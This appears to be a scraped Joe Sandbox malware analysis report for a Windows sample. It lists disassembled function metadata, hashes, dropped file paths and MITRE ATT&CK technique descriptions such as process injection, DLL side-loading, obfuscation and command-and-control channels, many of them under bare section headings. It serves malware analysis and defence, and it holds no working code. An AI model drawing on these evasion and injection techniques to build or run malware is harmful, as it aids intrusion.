Function 00BC6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BC603C
GetProcAddress.KERNEL32(00000000,00BC6064), ref: 00BC604F

Strings

kernel32.dll, xrefs: 00BC603B

Memory Dump Source

Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 27b86e598121c085709b1f9ae80fd56397083c8a52743748cedeef90cd965506
Instruction ID: db5a4be2ab89e158889fc10b84435c36de854a3893f2d697a4e2d276cdd58af5
Opcode Fuzzy Hash: 27b86e598121c085709b1f9ae80fd56397083c8a52743748cedeef90cd965506
Instruction Fuzzy Hash: 5CF0CDB11402898BEF708EA8CC84FDE3BE4EB05700F5004AEEA09DB282CB3486058B24

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ArjM1qx3hV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lhwmJX.exe_2fd4019e8c5ecba5bd47e3021cb2b33c81855e_dafd7f56_cfb97327-de41-473e-9b7b-57a0563d5bae\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5128.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5261.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5282.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

C:\Users\user\AppData\Local\Temp\18FB2552.exe

C:\Users\user\AppData\Local\Temp\lhwmJX.exe

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
ArjM1qx3hV.exe

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 221
COMMON

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 00406448 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00BC29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00BC1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Function 00BC1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre